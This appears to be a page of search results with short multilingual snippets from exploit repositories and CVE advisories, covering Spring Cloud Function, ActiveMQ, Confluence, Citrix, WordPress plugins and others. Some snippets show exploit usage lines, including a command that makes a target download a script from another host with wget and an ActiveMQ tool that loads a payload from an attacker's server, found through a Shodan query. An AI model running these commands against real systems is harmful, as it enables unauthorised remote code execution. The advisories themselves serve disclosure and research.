522484 matches found
CVE-2022-22963-PoC
CVE-2022-22963: Spring4Shell RCE 漏洞利用 这是一个 Spring4Shell(CVE-2022-22963)的 Python 实现,影响运行 Spring Cloud Function /tmp/rce $ python exploit.py 10.10.10.10:8080 'wget http://10.10.10.60/test.sh -O /tmp/test.sh' + Host is vulnerable + Command executed + Exploit completed $ python exploit.py...
From-EternalBlue-to-CVE-2025-2776-The-Evolution-of-an-SMB-Attack
De-EternalBlue-a-CVE-2025-2776-La-Evolucion-de-un-Ataque-SMB Conmocionó al mundo en 2017 y ha evolucionado hasta el CVE‑2025‑2776 actual. Microsoft sigue confiando en SMBv1; este artículo explicará cómo los atacantes han ajustado la cadena desde un simple DLL hasta una pila completa de...
CVE-2023-46604
CVE-2023-46604 CVE-2023-46604 漏洞利用工具 此工具可帮助利用此漏洞。 用于查找目标的 Shodan 查询: root@kitploit: product:"ActiveMQ" port:"61616" 工具使用方法: root@kitploit: for read targets from the file: python3 exploit.py -f targets -c http://YourVPS/poc.xml --- single target: python3 exploit.py -ip IP -c http://YourVPS/poc.xml...
Vulnerabilities fixed in Cisco Secure Firewall Management Center
The vulnerability with reference CVE-2026-20079 is located in the web interface of Cisco Secure Firewall Management Center. An unauthenticated remote malicious party can bypass authentication controls by exploiting an incorrect system process created at startup. The malicious party can exploit th...
CVE-2023-43149
CVE-2023-43149 作者 : Aitor Herrero Fuentes 厂商: SPA-Cart 厂商主页: https://spa-cart.com/ 软件链接: https://demo.spa-cart.com/admin 版本: 1.9.0.3 测试环境: Windows 10 Pro CSRF 添加根账户 Cross Site Request Forgery 漏洞存在于 demo.spa-cart.com 应用程序中,允许远程攻击者执行任意代码,只需一次点击即可添加一个具有“角色状态”的恶意用户。 当恶意行为者能够诱骗受害者执行他们本不打算执行的操作时,就会发生...
Assignement_3-CVE-2017-7269
CVE-2017-7269 姓名:Killian Munt-Buron and Naji Ullah Abbasi CVE 描述 CVE-2017-7269 是 Microsoft Windows Server 2003 R2 中的一个缓冲区溢出漏洞。 该漏洞位于 WebDAV 的 ScStoragePathFromUrl 函数中。 该漏洞允许通过一个长头部执行任意代码。 头部以 if: 添加或删除程序 = 添加/删除 Windows 组件 选择应用程序服务器,然后点击详细信息。 选择 Internet Information Services IIS 验证已选中公用文件和万维网服务。...
Apache-OFBiz-Exploit
Apache-OFBiz-Exploit Apache OFBiz CVE-2024-38856 用エクスプロイト 作成者: Alisson Faoli 説明 このリポジトリには、Apache OFBiz で見つかった CVE-2024-38856 脆弱性のエクスプロイトが含まれています。この欠陥により、認証なしの RCE Remote Code Execution が可能になります。 注: このエクスプロイトは教育および研究目的でのみ提供されます。不正使用は違法となる可能性があり、その責任はすべてユーザーにあります。 脆弱性の詳細 CVE: CVE-2024-38856...
CVE-2022-26134-Confluence-RCE
CVE-2022-26134 漏洞利用:通过 OGNL 注入实现 Confluence 预认证远程代码执行 OGNL 领域中的又一个漏洞利用 描述 Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业维基系统。 2022 年 6 月 2 日,Atlassian 针对其 Confluence Server 和 Data Center 应用发布了一份安全公告,强调了一个严重级别的未认证远程代码执行漏洞。该 OGNL 注入漏洞允许未认证用户在 Confluence Server 或 Data Center 实例上执行任意代码。 环境搭建 要搭建实验环境,请...
CVE-2020-9047
使用/帮助菜单 root@kitploit: usage: CVE-2020-9047.py -h -p RPORT -s LPORT --command -d WEBDIR -U USERNAME -P PASSWORD WINDOWS,LINUX,CHECK RHOST LHOST PAYLOAD Exploit for exacqVision Web Service as outlined in CVE-2020-9047. This program targets Windows and Linux x86 installations of exacqVision Web...
CVE-2026-78159
The The Events Calendar plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 6.17.3 via the parsearray function. This is due to insufficient validation of the widget 'classes' map, allowing a plain-array payload to bypass the issafewidgetinstance objec...
CVE-2026-85200
The GEO my WP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.5.5.3 via the gmwpostslocatorajaxinfowindowloader function. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the...
CVE-2026-78006
The The Events Calendar plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 6.17.4 via the issafewidgetinstance function. This is due to insufficient protection in issafewidgetinstance, which can be bypassed because PHP fires magic methods during its...
CVE-2026-78175
The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.0.7 via the withdrawmethodfield parameter of the tutorsavewithdrawaccount AJAX handler. This is due to the handler lacking any capability or role...
citrix_dir_traversal_rce
citrixdirtraversalrce 在 Citrix Application Delivery Controller(ADC,即 NetScaler)和 Gateway 10.5、11.1、12.0、12.1 和 13.0 中发现了一个目录遍历漏洞。 当 NSPPE 收到对 GET /vpn/index.html 的请求时,它本应将该请求发送给 Apache 进行处理。然而,通过构造请求 GET /vpn/../vpns/(该请求未经过净化),Apache 将路由转换为 GET /vpns/ 并正常处理这最后一个请求。 这个 /vpns/ 目录之所以引人注目,是因为它包含 Per...
CVE-2026-Pending-Flask-Uploads-Path-Traversal-PoC
CVE-2026-XXXXX Pending: Flask-Uploads中的路径遍历 漏洞信息 产品 :Flask-Uploads 版本 :0.2.1(以及可能更早的版本) 漏洞类型 :路径遍历(目录遍历) CWE-ID : CWE-22 严重性 :高 CVSS 7.5 影响 :任意文件写入,远程代码执行 RCE 描述 在 Flask-Uploads 0.2.1 版本中存在一个严重的路径遍历漏洞。该库在将上传文件保存到文件系统之前,未能正确清理文件名。 具体来说,flaskuploads.py 中的 save 方法直接使用 os.path.join...
CVE-2024-25600
Bricks Builder RCE 漏洞利用 CVE-2024-25600 本项目包含一个基于 Python 的漏洞利用脚本,针对 Bricks Builder WordPress 插件中标识为 CVE-2024-25600 的远程代码执行(RCE)漏洞。该漏洞利用程序通过一个易受攻击的 REST API 端点注入 PHP 代码,从而实现未经授权的远程命令执行。 此外,还提供了一个分析脚本,用于解析和汇总漏洞利用结果,包括提取用户信息和执行 IP 地理位置查询。 功能特性 自动从目标 URL 提取 nonce。 用于验证漏洞的测试载荷。 注入后门载荷,可通过 HTTP GET...
CVE-2022-21907-RCE
CVE-2022-21907-RCE CVE-2022-21907脆弱性RCE PoC 使用方法: go run ./CVE-2022-21907.go -h...
CVE-2026-54984
CVE-2026-54984 Windows ICC 文件解析越界写入 — 远程代码执行 通过 Zero Day Initiative 报告,编号为 ZDI-CAN-30441 ,以 ZDI-26-543 发布,微软已在 2026 年 8 月更新周期中修复。 大家好,我是 Kağan Çapar。我将此漏洞报告给了 Zero Day Initiative,后者于 2026 年 6 月 2 日向微软披露。该漏洞已于 2026 年 8 月 11 日(8 月补丁星期二)修复并公布,我也在 ZDI 公告中获得了致谢。 本仓库的内容。 这是一份公开的披露记录:标识符、评分、受影响版本、补丁 KB...
CVE-2019-17571
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: https://mp.weixin.qq.com/s/okU2y0izfnKXXtXG3EfLkQ 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j...
CVE-2017-11882
CVE-2017-11882 El script original proviene de https://github.com/embedi/CVE-2017-11882 CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://vulners.com/cve/CVE-2017-11882 Investigación:...